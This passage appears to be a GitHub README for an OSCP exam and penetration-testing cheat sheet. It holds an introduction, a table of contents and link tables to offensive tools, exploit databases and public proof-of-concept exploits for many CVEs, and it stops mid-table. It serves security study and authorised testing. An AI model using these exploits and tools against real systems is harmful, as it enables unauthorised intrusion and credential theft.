0xsyr0/OSCP

GitHub: 0xsyr0/OSCP

针对 OSCP 考试与渗透测试的综合实战速查表。

Stars: 3785 | Forks: 774

# OSCP Cheat Sheet ![GitHub stars](https://img.shields.io/github/stars/0xsyr0/OSCP?logoColor=yellow) ![GitHub forks](https://img.shields.io/github/forks/0xsyr0/OSCP?logoColor=purple) ![GitHub watchers](https://img.shields.io/github/watchers/0xsyr0/OSCP?logoColor=green)
![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/m/0xsyr0/OSCP) ![GitHub contributors](https://img.shields.io/github/contributors/0xsyr0/OSCP) Since this little project gets more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam. As OffSec published the `OffSec Certified Professional Plus` or `OSCP+` certification which is only valid for `3 years`, I now will add more advanced techniques like for example `Active Directory Certificate Services (AD CS) Abuse` and `Shadow Credentials Attacks` to cover as much course content as possible. Feel free to submit a pull request or contact me on [X](https://twitter.com/syr0_) — or preferably [Bluesky](https://bsky.app/profile/0xsyr0.bsky.social) — if you have any suggestions. Every contribution is appreciated! Here are the link to the [OSCP Exam Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) and the discussion about [LinPEAS](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/?hss_channel=tw-134994790). I hope this helps. Also here are two more important resources you should check out before you take the exam. - [https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide) - [https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams](https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams) Thank you for reading.
## Table of Contents - [Basics](#basics) - [Information Gathering](#information-gathering) - [Vulnerability Analysis](#vulnerability-analysis) - [Web Application Analysis](#web-application-analysis) - [Database Assessment](#database-assessment) - [Password Attacks](#password-attacks) - [Exploitation Tools](#exploitation-tools) - [Post Exploitation](#post-exploitation) - [Exploit Databases](#exploit-databases) - [CVEs](#cves) - [Payloads](#payloads) - [Wordlists](#wordlists) - [Reporting](#reporting) - [Social Media Resources](#social-media-resources) - [Commands](#commands) - [Basics](#basics-1) - [curl](#curl) - [File Transfer](#file-transfer) - [FTP](#ftp) - [Kerberos](#kerberos) - [Linux](#linux) - [Microsoft Windows](#microsoft-windows) - [NFS](#nfs) - [PHP Webserver](#php-webserver) - [Ping](#ping) - [Port Forwarding](#port-forwarding-1) - [Python Webserver](#python-webserver) - [RDP](#rdp) - [showmount](#showmount) - [SMB](#smb) - [smbclient](#smbclient) - [SSH](#ssh) - [Time and Date](#time-and-date) - [Tmux](#tmux) - [Upgrading Shells](#upgrading-shells) - [uv](#uv) - [VirtualBox](#virtualbox) - [virtualenv](#virtualenv) - [Information Gathering](#information-gathering-1) - [memcached](#memcached) - [NetBIOS](#netbios) - [Nmap](#nmap) - [Port Scanning](#port-scanning) - [snmpwalk](#snmpwalk) - [Web Application Analysis](#web-application-analysis-1) - [Burp Suite](#burp-suite) - [cadaver](#cadaver) - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) - [ffuf](#ffuf) - [Gobuster](#gobuster) - [GitTools](#gittools) - [Local File Inclusion (LFI)](#local-file-inclusion-lfi) - [PDF PHP Inclusion](#pdf-php-inclusion) - [PHP Upload Filter Bypasses](#php-upload-filter-bypasses) - [PHP Filter Chain Generator](#php-filter-chain-generator) - [PHP Generic Gadget Chains (PHPGGC)](#php-generic-gadget-chains-phpggc) - [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf) - [Server-Side Template Injection (SSTI)](#server-side-template-injection-ssti) - [Upload Vulnerabilities](#upload-vulnerabilities) - [wfuzz](#wfuzz) - [WPProbe](#wpprobe) - [WPScan](#wpscan) - [XML External Entity (XXE)](#xml-external-entity-xxe) - [Database Analysis](#database-analysis) - [impacket-mssqlclient](#impacket-mssqlclient) - [MongoDB](#mongodb) - [MSSQL](#mssql) - [MySQL](#mysql) - [NoSQL Injection](#nosql-injection) - [PostgreSQL](#postgresql) - [Redis](#redis) - [SQL Injection](#sql-injection) - [SQL Truncation Attack](#sql-truncation-attack) - [sqlite3](#sqlite3) - [sqsh](#sqsh) - [Password Attacks](#password-attacks-1) - [DonPAPI](#donpapi) - [fcrack](#fcrack) - [Group Policy Preferences (GPP)](#group-policy-preferences-gpp) - [hashcat](#hashcat) - [Hydra](#hydra) - [John the Ripper](#john-the-ripper) - [Kerbrute](#kerbrute) - [LaZagne](#lazagne) - [mimikatz](#mimikatz) - [NetExec](#netexec) - [pypykatz](#pypykatz) - [Spray-Passwords](#spray-passwords) - [Exploitation Tools](#exploitation-tools-1) - [Metasploit](#metasploit) - [Post Exploitation](#post-exploitation-1) - [Account Operators Group Membership](#account-operators-group-membership) - [Active Directory](#active-directory) - [Active Directory Certificate Services (AD CS)](#active-directory-certificate-services-ad-cs) - [ADCSTemplate](#adcstemplate) - [ADMiner](#adminer) - [BloodHound](#bloodhound) - [Bloodhound-Legacy](#bloodhound-legacy) - [BloodHound Python](#bloodhound-python) - [bloodyAD](#bloodyAD) - [Certify](#certify) - [Certipy](#certipy) - [enum4linux-ng](#enum4linux-ng) - [Evil-WinRM](#evil-winrm) - [Impacket](#impacket-1) - [JAWS](#jaws) - [Kerberos](#kerberos-1) - [ldapsearch](#ldapsearch) - [Linux](#linux-1) - [Microsoft Windows](#microsoft-windows-1) - [NTLM](#ntlm) - [PassTheCert](#passthecert) - [Penelope](#penelope) - [PKINITtools](#pkinittools) - [Port Scanning](#port-scanning-1) - [powercat](#powercat) - [Powermad](#powermad) - [PowerShell](#powershell) - [PrivescCheck](#privesccheck) - [pwncat](#pwncat) - [rpcclient](#rpcclient) - [Rubeus](#rubeus) - [RunasCs](#runascs) - [RustHound-CE](#rusthound-ce) - [Seatbelt](#seatbelt) - [Shadow Credentials](#shadow-credentials) - [smbpasswd](#smbpasswd) - [Titanis](#titanis) - [winexe](#winexe) - [Social Engineering Tools](#social-engineering-tools) - [Microsoft Office Word Phishing Macro](#microsoft-office-word-phishing-macro) - [Microsoft Windows Library Files](#microsoft-windows-library-files) - [CVE](#cve) - [CVE-2014-6271: Shellshock RCE PoC](#cve-2014-6271-shellshock-rce-poc) - [CVE-2016-1531: exim LPE](#cve-2016-1531-exim-lpe) - [CVE-2019-14287: Sudo Bypass](#cve-2019-14287-sudo-bypass) - [CVE-2020-1472: ZeroLogon PE](#cve-2020-1472-zerologon-pe) - [CVE-2021–3156: Sudo / sudoedit LPE](#cve-2021-3156-sudo--sudoedit-lpe) - [CVE-2021-42287: NoPac LPE](#cve-2021-42287-nopac-lpe) - [CVE-2021-44228: Log4Shell RCE (0-day)](#cve-2021-44228-log4shell-rce-0-day) - [CVE-2022-0847: Dirty Pipe LPE](#cve-2022-0847-dirty-pipe-lpe) - [CVE-2022-22963: Spring4Shell RCE (0-day)](#cve-2022-22963-spring4shell-rce-0-day) - [CVE-2022-31214: Firejail LPE](#cve-2022-31214-firejail-lpe) - [CVE-2023-21746: Windows NTLM EoP LocalPotato LPE](#cve-2023-21746-windows-ntlm-eop-localpotato-lpe) - [CVE-2023-22809: Sudo Bypass](#cve-2023-22809-sudo-bypass) - [CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)](#cve-2023-32629-cve-2023-2640-gameoverlay-ubuntu-kernel-exploit-lpe-0-day) - [CVE-2023-4911: Looney Tunables LPE](#cve-2023-4911-looney-tunables-lpe) - [CVE-2023-7028: GitLab Account Takeover](#cve-2023-7028-gitlab-account-takeover) - [CVE-2024-4577: PHP-CGI Argument Injection Vulnerability RCE](#cve-2024-4577-php-cgi-argument-injection-vulnerability-rce) - [CVE-2025-29927: Next.js Authentication Bypass](#cve-2025-29927-nextjs-authentication-bypass) - [CVE-2025-32463: chwoot sudo LPE](#cve-2025-32463-chwoot-sudo-lpe) - [CVE-2025-55182: React2Shell RCE](#cve-2025-55182-react2shell-rce) - [CVE-2026-24061: GNU Inetutils telnetd RCE](#cve-2026-24061-gnu-inetutils-telnetd-rce) - [CVE-2026-46300: Fragnesia Universal Linux LPE](#cve-2026-46300-fragnesia-universal-linux-lpe) - [BadSuccessor Delegated Managed Service Account (dMSA) LPE](#badsuccessor-delegated-managed-service-account-dmsa-lpe) - [GodPotato LPE](#godpotato-lpe) - [Juicy Potato LPE](#juicy-potato-lpe) - [JuicyPotatoNG LPE](#juicypotatong-lpe) - [MySQL 4.x/5.0 User-Defined Function (UDF) Dynamic Library (2) LPE](#mysql-4x50-user-defined-function-udf-dynamic-library-2-lpe) - [PrintSpoofer LPE](#printspoofer-lpe) - [SharpEfsPotato LPE](#sharpefspotato-lpe) - [Shocker Container Escape](#shocker-container-escape) - [Payloads](#payloads-1) - [Exiftool](#exiftool) - [Reverse Shells](#reverse-shells) - [Web Shells](#web-shells) - [Templates](#templates) - [ASPX Web Shell](#aspx-web-shell) - [Bad YAML](#bad-yaml) - [Wordlists](#wordlists-1) - [Bash](#bash) - [CeWL](#cewl) - [CUPP](#cupp) - [crunch](#crunch) - [JavaScript Quick Wordlist](#javascript-quick-wordlist) - [Username Anarchy](#username-anarchy) ### Basics | Name | URL | | --- | --- | | Chisel | https://github.com/jpillora/chisel | | CyberChef | https://gchq.github.io/CyberChef | | Ligolo-ng | https://github.com/nicocha30/ligolo-ng | | Swaks | https://github.com/jetmore/swaks | ### Information Gathering | Name | URL | | --- | --- | | Nmap | https://github.com/nmap/nmap | ### Vulnerability Analysis | Name | URL | | --- | --- | | nikto | https://github.com/sullo/nikto | | Sparta | https://github.com/SECFORCE/sparta | ### Web Application Analysis | Name | URL | | --- | --- | | ffuf | https://github.com/ffuf/ffuf | | fpmvuln | https://github.com/hannob/fpmvuln | | Gobuster | https://github.com/OJ/gobuster | | JSON Web Tokens | https://jwt.io | | JWT_Tool | https://github.com/ticarpi/jwt_tool | | JWTLens | https://jwtlens.netlify.app | | Leaky Paths | https://github.com/ayoubfathi/leaky-paths | | PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings | | PHP Filter Chain Generator | https://github.com/synacktiv/php_filter_chain_generator | | PHPGGC | https://github.com/ambionics/phpggc | | Spose | https://github.com/aancw/spose | | Wfuzz | https://github.com/xmendez/wfuzz | | WhatWeb | https://github.com/urbanadventurer/WhatWeb | | WPProbe | https://github.com/Chocapikk/wpprobe | | WPScan | https://github.com/wpscanteam/wpscan | ### Database Assessment | Name | URL | | --- | --- | | RedisModules-ExecuteCommand | https://github.com/n0b0dyCN/RedisModules-ExecuteCommand | | Redis RCE | https://github.com/Ridter/redis-rce | | Redis Rogue Server | https://github.com/n0b0dyCN/redis-rogue-server | | SQL Injection Cheatsheet | https://tib3rius.com/sqli.html | ### Password Attacks | Name | URL | | --- | --- | | Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet | | Firefox Decrypt | https://github.com/unode/firefox_decrypt | | hashcat | https://hashcat.net/hashcat | | Hydra | https://github.com/vanhauser-thc/thc-hydra | | John the Ripper | https://github.com/openwall/john | | keepass-dump-masterkey | https://github.com/CMEPW/keepass-dump-masterkey | | KeePwn | https://github.com/Orange-Cyberdefense/KeePwn | | Kerbrute | https://github.com/ropnop/kerbrute | | LaZagne | https://github.com/AlessandroZ/LaZagne | | mimikatz | https://github.com/gentilkiwi/mimikatz | | NetExec | https://github.com/Pennyw0rth/NetExec | | ntlm.pw | https://ntlm.pw | | pypykatz | https://github.com/skelsec/pypykatz | ### Exploitation Tools | Name | URL | | --- | --- | | Evil-WinRM | https://github.com/Hackplayers/evil-winrm | | Metasploit | https://github.com/rapid7/metasploit-framework | ### Post Exploitation | Name | URL | | --- | --- | | ADCSKiller - An ADCS Exploitation Automation Tool | https://github.com/grimlockx/ADCSKiller | | ADCSTemplate | https://github.com/GoateePFE/ADCSTemplate | | ADMiner | https://github.com/Mazars-Tech/AD_Miner | | adPEAS | https://github.com/ajm4n/adPEAS | | BloodHound Docker | https://github.com/belane/docker-bloodhound | | BloodHound | https://github.com/SpecterOps/BloodHound | | BloodHound-Legacy | https://github.com/SpecterOps/BloodHound-Legacy | | BloodHound | https://github.com/ly4k/BloodHound | | BloodHound-Legacy Collectors | https://github.com/SpecterOps/BloodHound-Legacy/tree/master/Collectors | | BloodHound Python | https://github.com/dirkjanm/BloodHound.py | | bloodhound-quickwin | https://github.com/kaluche/bloodhound-quickwin | | bloodyAD | https://github.com/CravateRouge/bloodyAD | | Cable | https://github.com/logangoins/Cable | | Certify | https://github.com/GhostPack/Certify | | Certipy | https://github.com/ly4k/Certipy | | certipy-merged | https://github.com/zimedev/certipy-merged | | Cheat Sheet - Attack Active Directory | https://github.com/drak3hft7/Cheat-Sheet---Active-Directory | | DonPAPI | https://github.com/login-securite/DonPAPI | | enum4linux-ng | https://github.com/cddmp/enum4linux-ng | | Ghostpack-CompiledBinaries | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries | | gopacket | https://github.com/mandiant/gopacket | | GTFOBins | https://gtfobins.github.io | | Impacket | https://github.com/fortra/impacket | | Impacket Static Binaries | https://github.com/ropnop/impacket_static_binaries | | JAWS | https://github.com/411Hall/JAWS | | KrbRelay | https://github.com/cube0x0/KrbRelay | | KrbRelayUp | https://github.com/Dec0ne/KrbRelayUp | | Krbrelayx | https://github.com/dirkjanm/krbrelayx | | LAPSDumper | https://github.com/n00py/LAPSDumper | | LES | https://github.com/The-Z-Labs/linux-exploit-suggester | | LinEnum | https://github.com/rebootuser/LinEnum | | lsassy | https://github.com/Hackndo/lsassy | | Moriaty | https://github.com/BC-SECURITY/Moriarty | | nanodump | https://github.com/fortra/nanodump | | Outpacket | https://github.com/n00py/Outpacket | | PassTheCert | https://github.com/AlmondOffSec/PassTheCert | | PEASS-ng | https://github.com/carlospolop/PEASS-ng | | Penelope | https://github.com/brightio/penelope | | PKINITtools | https://github.com/dirkjanm/PKINITtools | | powercat | https://github.com/besimorhino/powercat | | PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack | | PowerUp | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 | | PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 | | PowerView.py | https://github.com/aniqfakhrul/powerview.py | | PPLdump | https://github.com/itm4n/PPLdump | | Priv2Admin | https://github.com/gtworek/Priv2Admin | | PrivescCheck | https://github.com/itm4n/PrivescCheck | | PSPKIAudit | https://github.com/GhostPack/PSPKIAudit | | pspy | https://github.com/DominicBreuker/pspy | | pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit | | pwncat | https://github.com/calebstewart/pwncat | | pypykatz | https://github.com/skelsec/pypykatz | | pyWhisker | https://github.com/ShutdownRepo/pywhisker | | Rubeus | https://github.com/GhostPack/Rubeus | | RunasCs | https://github.com/antonioCoco/RunasCs | | RustHound | https://github.com/OPENCYBER-FR/RustHound | | scavenger | https://github.com/SpiderLabs/scavenger | | SharpADWS | https://github.com/wh0amitz/SharpADWS | | SharpCollection | https://github.com/Flangvik/SharpCollection | | SharpChromium | https://github.com/djhohnstein/SharpChromium | | SharpHound | https://github.com/SpecterOps/SharpHound | | SharpSuccessor | https://github.com/logangoins/SharpSuccessor | | SharpView | https://github.com/tevora-threat/SharpView | | Sherlock | https://github.com/rasta-mouse/Sherlock | | Titanis | https://github.com/trustedsec/Titanis | | WADComs | https://wadcoms.github.io | | Watson | https://github.com/rasta-mouse/Watson | | WESNG | https://github.com/bitsadmin/wesng | Whisker | https://github.com/eladshamir/Whisker | | Windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check | | Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html | | Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation | ### Exploit Databases | Database | URL | | --- | --- | | 0day.today Exploit Database | https://0day.today | | Exploit Database | https://www.exploit-db.com | | Packet Storm | https://packetstormsecurity.com | | Sploitus | https://sploitus.com | ### CVEs | CVE | Descritpion | URL | | --- | --- | --- | | CVE-2014-6271 | Shocker RCE | https://github.com/nccgroup/shocker | | CVE-2014-6271 | Shellshock RCE PoC | https://github.com/zalalov/CVE-2014-6271 | | CVE-2014-6271 | Shellshocker RCE POCs | https://github.com/mubix/shellshocker-pocs | | CVE-2016-5195 | Dirty COW LPE | https://github.com/firefart/dirtycow | | CVE-2016-5195 | Dirty COW '/proc/self/mem' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40847 | | CVE-2016-5195 | Dirty COW 'PTRACE_POKEDATA' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40839 | | CVE-2017-0144 | EternalBlue (MS17-010) RCE | https://github.com/d4t4s3c/Win7Blue | | CVE-2017-0199 | RTF Dynamite RCE | https://github.com/bhdresh/CVE-2017-0199 | | CVE-2018-7600 | Drupalgeddon 2 RCE | https://github.com/g0rx/CVE-2018-7600-Drupal-RCE | | CVE-2018-10933 | libSSH Authentication Bypass | https://github.com/blacknbunny/CVE-2018-10933 | | CVE-2018-16509 | Ghostscript PIL RCE | https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509 | | CVE-2019-14287 | Sudo Bypass LPE | https://github.com/n0w4n/CVE-2019-14287 | | CVE-2019-18634 | Sudo Buffer Overflow LPE | https://github.com/saleemrashid/sudo-cve-2019-18634 | | CVE-2019-5736 | RunC Container Escape PoC | https://github.com/Frichetten/CVE-2019-5736-PoC | | CVE-2019-6447 | ES File Explorer Open Port Arbitrary File Read | https://github.com/fs0c131y/ESFileExplorerOpenPortVuln | | CVE-2019-7304 | dirty_sock LPE | https://github.com/initstring/dirty_sock | | CVE-2020-0796 | SMBGhost RCE PoC | https://github.com/chompie1337/SMBGhost_RCE_PoC | | CVE-2020-1472 | ZeroLogon PE Checker & Exploitation Code | https://github.com/VoidSec/CVE-2020-1472 | | CVE-2020-1472 | ZeroLogon PE Exploitation Script | https://github.com/risksense/zerologon | | CVE-2020-1472 | ZeroLogon PE PoC | https://github.com/dirkjanm/CVE-2020-1472 | | CVE-2020-1472 | ZeroLogon PE Testing Script | https://github.com/SecuraBV/CVE-2020-1472 | | CVE-2021-1675,CVE-2021-34527 | PrintNightmare LPE RCE | https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527 | | CVE-2021-1675 | PrintNightmare LPE RCE (PowerShell Implementation) | https://github.com/calebstewart/CVE-2021-1675 | | CVE-2021-21972 | vCenter RCE | https://github.com/horizon3ai/CVE-2021-21972 | | CVE-2021-22204 | ExifTool Command Injection RCE | https://github.com/AssassinUKG/CVE-2021-22204 | | CVE-2021-22204 | GitLab ExifTool RCE | https://github.com/CsEnox/Gitlab-Exiftool-RCE | | CVE-2021-22204 | GitLab ExifTool RCE (Python Implementation) | https://github.com/convisolabs/CVE-2021-22204-exiftool | | CVE-2021-26085 | Confluence Server RCE | https://github.com/Phuong39/CVE-2021-26085 | | CVE-2021-27928 | MariaDB/MySQL wsrep provider RCE | https://github.com/Al1ex/CVE-2021-27928 | | CVE-2021-3129 | Laravel Framework RCE | https://github.com/nth347/CVE-2021-3129_exploit | | CVE-2021-3156 | Sudo / sudoedit LPE | https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit | | CVE-2021-3156 | Sudo / sudoedit LPE PoC | https://github.com/blasty/CVE-2021-3156 | | CVE-2021-3493 | OverlayFS Ubuntu Kernel Exploit LPE | https://github.com/briskets/CVE-2021-3493 | | CVE-2021-3560 | polkit LPE (C Implementation) | https://github.com/hakivvi/CVE-2021-3560 | | CVE-2021-3560 | polkit LPE | https://github.com/Almorabea/Polkit-exploit | | CVE-2021-3560 | polkit LPE PoC | https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation | | CVE-2021-36934 | HiveNightmare LPE | https://github.com/GossiTheDog/HiveNightmare | | CVE-2021-36942 | PetitPotam | https://github.com/topotam/PetitPotam | | CVE-2021-36942 | DFSCoerce | https://github.com/Wh04m1001/DFSCoerce | | CVE-2021-4034 | PwnKit Pkexec Self-contained Exploit LPE | https://github.com/ly4k/PwnKit | | CVE-2021-4034 | PwnKit Pkexec LPE PoC (1) | https://github.com/dzonerzy/poc-cve-2021-4034 | | CVE-2021-4034 | PwnKit Pkexec LPE PoC (2) | https://github.com/arthepsy/CVE-2021-4034 | | CVE-2021-4034 | PwnKit Pkexec LPE PoC (3) | https://github.com/nikaiw/CVE-2021-4034 | | CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Archive) | https://github.com/klinix5/InstallerFileTakeOver | | CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Fork) | https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver | | CVE-2021-41773,CVE-2021-42013, CVE-2020-17519 | Simples Apache Path Traversal (0-day) | https://github.com/MrCl0wnLab/SimplesApachePathTraversal | | CVE-2021-42278,CVE-2021-42287 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE | https://github.com/WazeHell/sam-the-admin | | CVE-2021-42278 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE (Python Implementation) | https://github.com/ly4k/Pachine | | CVE-2021-42287,CVE-2021-42278 | noPac LPE (1) | https://github.com/cube0x0/noPac | | CVE-2021-42287,CVE-2021-42278 | noPac LPE (2) | https://github.com/Ridter/noPac | | CVE-2021-42321 | Microsoft Exchange Server RCE | https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 | | CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/kozmer/log4j-shell-poc | | CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/welk1n/JNDI-Injection-Exploit | | CVE-2022-0847 | DirtyPipe-Exploit LPE | https://github.com/n3rada/DirtyPipe | | CVE-2022-0847 | DirtyPipe-Exploits LPE | https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits | | CVE-2022-21999 | SpoolFool, Windows Print Spooler LPE | https://github.com/ly4k/SpoolFool | | CVE-2022-22963 | Spring4Shell RCE (0-day) | https://github.com/tweedge/springcore-0day-en | | CVE-2022-23119,CVE-2022-23120 | Trend Micro Deep Security Agent for Linux Arbitrary File Read | https://github.com/modzero/MZ-21-02-Trendmicro | | CVE-2022-24715 | Icinga Web 2 Authenticated Remote Code Execution RCE | https://github.com/JacobEbben/CVE-2022-24715 | | CVE-2022-26134 | ConfluentPwn RCE (0-day) | https://github.com/redhuntlabs/ConfluentPwn | | CVE-2022-31214 | Firejail / Firejoin LPE | https://seclists.org/oss-sec/2022/q2/188 | | CVE-2022-31214 | Firejail / Firejoin LPE | https://www.openwall.com/lists/oss-security/2022/06/08/10 | | CVE-2022-34918 | Netfilter Kernel Exploit LPE | https://github.com/randorisec/CVE-2022-34918-LPE-PoC | | CVE-2022-46169 | Cacti Authentication Bypass RCE | https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit | | CVE-2023-20598 | PDFWKRNL Kernel Driver LPE | https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL | | CVE-2023-21746 | Windows NTLM EoP LocalPotato LPE | https://github.com/decoder-it/LocalPotato | | CVE-2023-21768 | Windows Ancillary Function Driver for WinSock LPE POC | https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768 | | CVE-2023-21817 | Kerberos Unlock LPE PoC | https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b | | CVE-2023-22809 | sudoedit LPE | https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc | | CVE-2023-23752 | Joomla Unauthenticated Information Disclosure | https://github.com/Acceis/exploit-CVE-2023-23752 | | CVE-2023-25690 | Apache mod_proxy HTTP Request Smuggling PoC | https://github.com/dhmosfunk/CVE-2023-25690-POC | | CVE-2023-28879 | Shell in the Ghost: Ghostscript RCE PoC | https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce | | CVE-2023-32233 | Use-After-Free in Netfilter nf_tables LPE | https://github.com/Liuk3r/CVE-2023-32233 | | CVE-2023-32629, CVE-2023-2640 | GameOverlay Ubuntu Kernel Exploit LPE (0-day) | https://twitter.com/liadeliyahu/status/1684841527959273472?s=09 | | CVE-2023-36874 | Windows Error Reporting Service LPE (0-day) | https://github.com/Wh04m1001/CVE-2023-36874 | | CVE-2023-51467, CVE-2023-49070 | Apache OFBiz Authentication Bypass | https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass | | CVE-2023-7028 | GitLab Account Takeover | https://github.com/V1lu0/CVE-2023-7028 | | CVE-2023-7028 | GitLab Account Takeover | https://github.com/Vozec/CVE-2023-7028 | | CVE-2024-0582 | Ubuntu Linux Kernel io_uring LPE | https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582 | | CVE-2024-1086 | Use-After-Free Linux Kernel Netfilter nf_tables LPE | https://github.com/Notselwyn/CVE-2024-1086 | | CVE-2024-4577 | PHP-CGI Argument Injection Vulnerability RCE | https://github.com/watchtowrlabs/CVE-2024-4577 | | CVE-2024-30088 | Microsoft Windows LPE | https://github.com/tykawaii98/CVE-2024-30088 | | CVE-2024-49138 | Windows Common Log File System Driver LPE | https://github.com/MrAle98/CVE-2024-49138-POC | | CVE-2025-14847 | MongoBleed MongoDB Unauthenticated Memory Leak Exploit RCE | https://github.com/joe-desimone/mongobleed | | CVE-2025-24071 | Windows File Explorer Spoofing Vulnerability (1) | https://github.com/ThemeHackers/CVE-2025-24071 | | CVE-2025-24071 | Windows File Explorer Spoofing Vulnerability (2) | https://github.com/0x6rss/CVE-2025-24071_PoC | | CVE-2025-24813 | Apache Tomcat Deserialization RCE (1) | https://github.com/iSee857/CVE-2025-24813-PoC | | CVE-2025-24813 | Apache Tomcat Deserialization RCE (2) | https://github.com/absholi7ly/POC-CVE-2025-24813 | | CVE-2025-29927 | Next.js Authentication Bypass | https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware | | CVE-2025-30397 | Windows Server 2025 Use-After-Free in JScript.dll (RCE) | https://github.com/mbanyamer/CVE-2025-30397---Windows-Server-2025-JScript-RCE-Use-After-Free- | | CVE-2025-32463 | chwoot sudo LPE | https://github.com/pr0v3rbs/CVE-2025-32463_chwoot | | CVE-2025-55182 | React2Shell RCE | https://github.com/msanft/CVE-2025-55182 | | CVE-2025-62215 | Windows Kernel LPE | https://github.com/dexterm300/CVE-2025-62215-exploit-poc | | CVE-2025-9074 | Docker Desktop (Windows) Container Escape - Host Write via Exposed Engine API | https://github.com/zenzue/CVE-2025-9074 | | CVE-2026-24061 | GNU Inetutils telnetd RCE | https://github.com/SafeBreach-Labs/CVE-2026-24061 | | CVE-2026-26128 | Windows SMB Server Improper Authentication LPE | https://github.com/jarnovandenbrink/CVE-2026-26128 | | CVE-2026-31431 | Copy Fail LPE (1) | https://github.com/theori-io/copy-fail-CVE-2026-31431 | | CVE-2026-31431 | Copy Fail LPE (2) | https://github.com/painoob/Copy-Fail-Exploit-CVE-2026-31431 | | CVE-2026-31635 | DirtyDecrypt / DirtyCBC LPE | https://github.com/v12-security/pocs/tree/main/dirtydecrypt | | CVE-2026-41096 | Windows DNS Client RCE | https://github.com/satchfunky/CVE-2026-41096-POC | | CVE-2026-42945 | NGINX Rift RCE | https://github.com/DepthFirstDisclosures/Nginx-Rift | | CVE-2026-46300 | Fragnesia Universal Linux LPE | https://github.com/v12-security/pocs/blob/main/fragnesia%2FREADME.md | ##### Miscellaneous Exploits | CVE | Descritpion | URL | | --- | --- | --- | | n/a | BadSuccessor LPE | https://github.com/ibaiC/BadSuccessor | | n/a | BlueHammer LPE (1) | https://git.projectnightcrawler.dev/NightmareEclipse/BlueHammer | | n/a | BlueHammer LPE (2) | https://github.com/0xjustBen/BlueHammer | | n/a | Dirty Frag Universal Linux LPE | https://github.com/V4bel/dirtyfrag | | n/a | MiniPlasma CVE-2020-17103 partially patched cldflt.sys LPE | https://git.projectnightcrawler.dev/NightmareEclipse/MiniPlasma | | n/a | NoFilter LPE | https://github.com/deepinstinct/NoFilter | | n/a | OfflineSAM LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM | | n/a | OfflineAddAdmin2 LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2 | | n/a | PrintSpoofer LPE (1) | https://github.com/dievus/printspoofer | | n/a | PrintSpoofer LPE (2) | https://github.com/itm4n/PrintSpoofer | | n/a | SharpSuccessor LPE | https://github.com/logangoins/SharpSuccessor | | n/a | Shocker Container Escape | https://github.com/gabrtv/shocker | | n/a | ssh-keysign-pwn | https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn | | n/a | StorSvc LPE | https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc | | n/a | SystemNightmare LPE | https://github.com/GossiTheDog/SystemNightmare | ##### Vegetable Exploits | CVE | Descritpion | URL | | --- | --- | --- | | n/a | ADCSCoercePotato LPE | https://github.com/decoder-it/ADCSCoercePotato | | n/a | CoercedPotato LPE | https://github.com/Prepouce/CoercedPotato | | n/a | DCOMPotato LPE | https://github.com/zcgonvh/DCOMPotato | | n/a | DeadPotato LPE | https://github.com/lypd0/DeadPotato | | n/a | GenericPotato LPE | https://github.com/micahvandeusen/GenericPotato | | n/a | GodPotato LPE | https://github.com/BeichenDream/GodPotato | | n/a | JuicyPotato LPE | https://github.com/ohpe/juicy-potato | | n/a | Juice-PotatoNG LPE | https://github.com/antonioCoco/JuicyPotatoNG | | n/a | MultiPotato LPE | https://github.com/S3cur3Th1sSh1t/MultiPotato | | n/a | RemotePotato0 LPE | https://github.com/antonioCoco/RemotePotato0 | | n/a | RoguePotato LPE | https://github.com/antonioCoco/RoguePotato | | n/a | RottenPotatoNG LPE | 